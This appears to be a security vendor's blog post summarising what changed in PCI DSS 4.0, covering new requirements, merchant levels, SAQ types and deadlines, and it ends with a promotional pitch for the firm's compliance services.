Previous All Posts Next

PCI DSS 4.0 Compliance Requirements: What Changed and What to Do

Posted: December 31, 1969 to Cybersecurity.

Understanding PCI DSS 4.0: The Biggest Update in a Decade

The Payment Card Industry Data Security Standard (PCI DSS) version 4.0 represents the most significant revision to the standard since its original release. Published by the PCI Security Standards Council in March 2022, version 4.0 formally replaced version 3.2.1 on March 31, 2024. Organizations that process, store, or transmit cardholder data must now comply with the updated requirements, with several new mandates carrying an extended deadline of March 31, 2025, which has now passed.

This means that as of 2026, full compliance with PCI DSS 4.0 including all formerly future-dated requirements is mandatory. Organizations that have not yet transitioned face increased audit scrutiny, potential fines from payment brands, and greater liability in the event of a data breach.

At Petronella Technology Group, we have spent more than 23 years helping businesses in Raleigh, NC and throughout the United States navigate complex compliance requirements. This guide explains what changed in PCI DSS 4.0, what you need to do about it, and how to maintain compliance in an evolving threat landscape.

What Changed from PCI DSS 3.2.1 to 4.0

PCI DSS 4.0 introduces several fundamental shifts in approach while maintaining the familiar 12-requirement structure. The most significant changes include the introduction of the customized approach, expanded authentication requirements, targeted risk analysis, and a greater emphasis on continuous security rather than point-in-time compliance.

The Customized Approach: Perhaps the most transformative change, PCI DSS 4.0 introduces the customized approach as an alternative to the traditional defined approach. Under the customized approach, organizations can implement security controls that differ from the specific requirements in the standard, provided they can demonstrate that their alternative controls meet the stated security objective. This gives mature organizations the flexibility to leverage innovative security solutions while still meeting the standard's intent.

The customized approach is not a shortcut. It requires rigorous documentation, a targeted risk analysis for each customized control, and validation by a Qualified Security Assessor (QSA). Organizations pursuing this approach must demonstrate that their alternative controls provide at least equivalent security to the defined requirements.

Targeted Risk Analysis: PCI DSS 4.0 replaces the blanket requirement for an annual risk assessment with targeted risk analyses. Organizations must now perform documented risk analyses to determine the frequency of specific activities, such as log reviews, vulnerability scans, and password changes. This approach acknowledges that a one-size-fits-all frequency is inappropriate; a high-risk e-commerce environment may need daily log reviews, while a low-risk environment with minimal cardholder data might justify a different frequency.

Enhanced Authentication: Multi-factor authentication (MFA) requirements have been significantly expanded. Under PCI DSS 3.2.1, MFA was required only for remote access and administrative access to the cardholder data environment (CDE). Version 4.0 extends MFA to all access to the CDE, not just remote or administrative access. Additionally, the standard now specifies that MFA implementations must be resistant to replay attacks and cannot be bypassed by any user, including administrators.

Security as a Continuous Process: PCI DSS 4.0 emphasizes that compliance is not a once-a-year activity. New requirements mandate that organizations assign clear responsibility for meeting each requirement, document and implement security policies that are actively maintained, and ensure that personnel understand their security responsibilities through regular training and awareness programs.

The 12 Requirement Families

PCI DSS 4.0 retains the 12 high-level requirement families, organized under six control objectives. Understanding this structure helps organizations plan their compliance programs:

Build and Maintain a Secure Network and Systems: Requirement 1 addresses network security controls (previously "firewalls"), with updated language reflecting modern architectures including cloud and containerized environments. Requirement 2 covers secure configurations for all system components, including updated guidance for cloud-based and virtual systems.

Protect Account Data: Requirement 3 governs the protection of stored account data, with new provisions for disk-level encryption and key management. Requirement 4 addresses encryption of cardholder data during transmission, including updated requirements for TLS configurations and certificate management.

Maintain a Vulnerability Management Program: Requirement 5 covers malware protection with expanded scope to include all system components in the CDE, not just those "commonly affected by malware." Requirement 6 addresses secure software development and maintenance, with significant new requirements for web application security including the mandatory use of a web application firewall (WAF) for public-facing applications.

Implement Strong Access Control Measures: Requirement 7 restricts access to cardholder data by business need to know. Requirement 8 addresses user identification and authentication, including the expanded MFA requirements. Requirement 9 covers physical access to cardholder data and systems.

Regularly Monitor and Test Networks: Requirement 10 addresses logging and monitoring with new requirements for automated log review mechanisms. Requirement 11 covers security testing, including new mandates for authenticated internal vulnerability scanning and updated penetration testing guidance.

Maintain an Information Security Policy: Requirement 12 encompasses organizational security policies, personnel training, incident response, and the overall security program. New provisions require organizations to perform targeted risk analyses, maintain an updated inventory of trusted keys and certificates, and implement a formal security awareness program that addresses phishing and social engineering.

Key New Requirements That Demand Immediate Attention

Several specific new requirements deserve particular attention because they represent significant operational changes for most organizations:

Automated Log Review (10.4.1.1): Organizations must now implement automated mechanisms to perform audit log reviews. Manual log reviews alone are no longer sufficient. This typically requires a Security Information and Event Management (SIEM) solution or equivalent technology capable of correlating events and generating alerts for suspicious activity.

Authenticated Vulnerability Scanning (11.3.1.2): Internal vulnerability scans must now include authenticated scanning, which provides deeper visibility into system configurations and vulnerabilities that unauthenticated scans cannot detect. This requires organizations to configure scanning credentials for all in-scope systems and manage those credentials securely.

Detection of Payment Page Tampering (6.4.3 and 11.6.1): Organizations with web-based payment pages must implement mechanisms to detect unauthorized modifications to payment page content. This addresses attacks where threat actors inject malicious JavaScript (known as web skimming or Magecart attacks) to capture cardholder data as it is entered. Technologies such as Content Security Policy (CSP), Subresource Integrity (SRI), and file integrity monitoring can address this requirement.

Encrypted Cardholder Data on Removable Media (3.5.1.2): If your organization stores cardholder data on removable media, which should be avoided when possible, that data must now be encrypted using strong cryptography. This applies to backup tapes, USB drives, and any other removable storage media.

Roles and Responsibilities Documentation: Every single requirement in PCI DSS 4.0 now includes a sub-requirement to document roles and responsibilities for performing the activities in that requirement. This is a significant documentation effort that many organizations underestimate.

Compliance Levels and SAQ Types

PCI DSS compliance requirements vary based on the volume of transactions your organization processes annually. The payment brands (Visa, Mastercard, American Express, and Discover) define four merchant levels:

Level 1: More than 6 million transactions annually. Requires an annual Report on Compliance (ROC) by a QSA and quarterly network scans by an Approved Scanning Vendor (ASV).

Level 2: 1 million to 6 million transactions annually. Requires an annual Self-Assessment Questionnaire (SAQ) and quarterly ASV scans. Some acquiring banks may require a QSA assessment.

Level 3: 20,000 to 1 million e-commerce transactions annually. Requires an annual SAQ and quarterly ASV scans.

Level 4: Fewer than 20,000 e-commerce transactions or up to 1 million total transactions annually. Requires an annual SAQ and quarterly ASV scans, though requirements are determined by the acquiring bank.

The SAQ type you complete depends on how you process payments. SAQ A is for merchants that fully outsource payment processing to a validated third party. SAQ A-EP applies to e-commerce merchants that partially outsource payment processing but whose websites could affect the security of the payment transaction. SAQ B covers merchants using only imprint machines or standalone dial-out terminals. SAQ C applies to merchants with payment application systems connected to the internet. SAQ D is the comprehensive questionnaire for merchants that do not qualify for any other SAQ type and covers all PCI DSS requirements.

Timeline and Key Dates

The PCI DSS 4.0 transition timeline has several important milestones that organizations must be aware of:

PCI DSS 3.2.1 was formally retired on March 31, 2024. All assessments conducted after this date must use version 4.0. The future-dated requirements in PCI DSS 4.0, which were best practices until March 31, 2025, are now fully mandatory. This includes requirements for targeted risk analysis, enhanced authentication, automated log review, authenticated scanning, and payment page tampering detection.

Organizations that have not yet implemented the formerly future-dated requirements are out of compliance and should take immediate action to close these gaps.

Building a PCI DSS 4.0 Compliance Program

Achieving and maintaining PCI DSS 4.0 compliance requires a systematic approach. Start with a gap assessment that compares your current controls against the 4.0 requirements, paying particular attention to the new and changed requirements. Prioritize remediation of gaps based on risk, focusing first on controls that directly protect cardholder data and those that address the most likely attack vectors.

Document everything. PCI DSS 4.0 places greater emphasis on documentation than any previous version. Policies, procedures, roles and responsibilities, risk analyses, and evidence of control implementation must all be maintained and kept current. Many organizations find that their technical controls are adequate but their documentation lags behind.

Organizations managing compliance alongside other regulatory frameworks such as HIPAA or CMMC should look for opportunities to harmonize controls and documentation, reducing redundant effort while satisfying multiple compliance obligations.

How Petronella Technology Group Can Help

PCI DSS 4.0 compliance is not optional for any organization that processes payment cards, and the full weight of the standard's requirements is now in effect. Whether you are starting from scratch, transitioning from 3.2.1, or looking to maintain your existing compliance program, professional guidance can save time, reduce risk, and ensure your controls actually protect your cardholder data rather than just checking boxes.

Petronella Technology Group brings more than 23 years of IT security and compliance experience to every engagement. Our managed IT services include ongoing compliance monitoring and support, ensuring your PCI DSS program remains effective as the standard evolves and your business grows.

Contact Petronella Technology Group to discuss your PCI DSS 4.0 compliance requirements and learn how we can help you protect your customers' payment data.

Need help implementing these strategies? Our cybersecurity experts can assess your environment and build a tailored plan.
Get Free Assessment
Explore Our Services
Cybersecurity AI Services Compliance HIPAA CMMC Managed IT

Related Articles

Zero Trust Vendors Compared: Top 10 for SMBs in 2026 Zero Trust Vendors Compared: Top 10 for SMBs in 2026 Automated Penetration Testing Tools: 2026 Comparison Automated Penetration Testing Tools: 2026 Comparison Incident Response Plan Template: Free Download & Guide Incident Response Plan Template: Free Download & Guide Cyber Threat Intelligence: What It Is and How to Use It Cyber Threat Intelligence: What It Is and How to Use It
Craig Petronella
Craig Petronella
CEO & Founder, Petronella Technology Group | CMMC Registered Practitioner

Craig Petronella is a cybersecurity expert with over 24 years of experience protecting businesses from cyber threats. As founder of Petronella Technology Group, he has helped over 2,500 organizations strengthen their security posture, achieve compliance, and respond to incidents.

LinkedIn Twitter About
Related Service
Protect Your Business with Our Cybersecurity Services

Our proprietary 39-layer ZeroHack cybersecurity stack defends your organization 24/7.

Explore Cybersecurity Services
Previous All Posts Next
Free cybersecurity consultation available Schedule Now